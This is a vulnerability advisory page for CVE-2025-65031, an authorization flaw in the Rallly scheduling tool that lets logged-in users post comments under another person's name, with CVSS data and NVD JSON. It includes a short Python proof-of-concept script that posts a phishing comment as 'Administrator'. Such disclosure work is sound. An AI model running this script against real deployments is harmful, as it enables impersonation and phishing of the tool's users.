Security Vulnerability Report
中文
CVE-2025-65031 CVSS 6.5 MEDIUM

CVE-2025-65031

Published: 2025-11-19 18:15:51
Last Modified: 2025-11-25 15:34:02
Source: [email protected]

Description

Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an improper authorization flaw in the comment creation endpoint allows authenticated users to impersonate any other user by altering the authorName field in the API request. This enables attackers to post comments under arbitrary usernames, including privileged ones such as administrators, potentially misleading other users and enabling phishing or social engineering attacks. This issue has been patched in version 4.5.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:* - VULNERABLE
Rallly < 4.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-65031 PoC - Rallly Authorization Bypass via authorName Manipulation # Target: Rallly < 4.5.4 TARGET_URL = "http://target.com" LOGIN_EMAIL = "[email protected]" LOGIN_PASSWORD = "attacker_password" EVENT_ID = "target-event-id" def exploit(): # Step 1: Login to get session session = requests.Session() login_data = { "email": LOGIN_EMAIL, "password": LOGIN_PASSWORD } session.post(f"{TARGET_URL}/api/auth/login", json=login_data) # Step 2: Create comment as administrator (impersonation) comment_data = { "eventId": EVENT_ID, "authorName": "Administrator", # Impersonate admin user "content": "This is a phishing message" } response = session.post( f"{TARGET_URL}/api/comments", json=comment_data ) print(f"Status: {response.status_code}") print(f"Response: {response.text}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65031", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:50.743", "lastModified": "2025-11-25T15:34:01.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an improper authorization flaw in the comment creation endpoint allows authenticated users to impersonate any other user by altering the authorName field in the API request. This enables attackers to post comments under arbitrary usernames, including privileged ones such as administrators, potentially misleading other users and enabling phishing or social engineering attacks. This issue has been patched in version 4.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.4", "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"}]}]}], "references": [{"url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-hhfc-6gq7-rrpm", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.